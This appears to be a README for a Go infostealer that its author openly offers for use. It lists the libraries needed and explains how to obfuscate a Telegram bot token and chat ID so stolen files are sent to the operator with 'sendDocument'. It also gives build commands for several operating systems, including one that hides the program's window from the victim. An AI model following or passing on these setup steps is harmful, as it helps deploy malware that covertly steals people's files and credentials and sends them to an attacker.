https://github.com/zalando/go-keyring
https://github.com/Pallinder/go-randomdata
https://github.com/mattn/go-sqlite3
go get github.com/Pallinder/go-randomdata
go get github.com/mattn/go-sqlite3
go get github.com/tidwall/gjson
go get github.com/zalando/go-keyring
go get golang.org/x/crypto/pbkdf2
- go-sqlite3 needs gcc on windows cause it depends on some c librares, just install it
to change the files destination you need to use mumbojumbo tool to obfuscate the strings, usage:
mumbojumbo -s="x" -p=foo
x is the bot token or the chat ID formatsendDocument?chat_id={ID}
then just copy the content offunc Get() { Copy this }
then paste inERxr8Z1
for bot token orWprep42
for Chat IDchange the function called
ERxr8Z1
inRiC4ef.go
with the obfuscated "bot token of telegram you just made" by mumbojumbo.then replace
Wprep42
function inRiC4ef.go
with the obfuscated "chat ID which the stealer will send the files to" in formatsendDocument?chat_id={ID}
by mumbojumbo.
go build -ldflags "-s -w" -o stealer.exe .
To hide the window
go build -ldflags "-s -w -H=windowsgui" -o stealer.exe .
GOOS=linux ARCH=386 go build -ldflags "-s -w" -o stealer .
GOOS=darwin ARCH=amd64 go build -ldflags "-s -w" -o stealer .
Instagram: @0xhades
- If you really want the unobfuscated strings of the source code just tell me to add it, cause i'm lazy to do it right now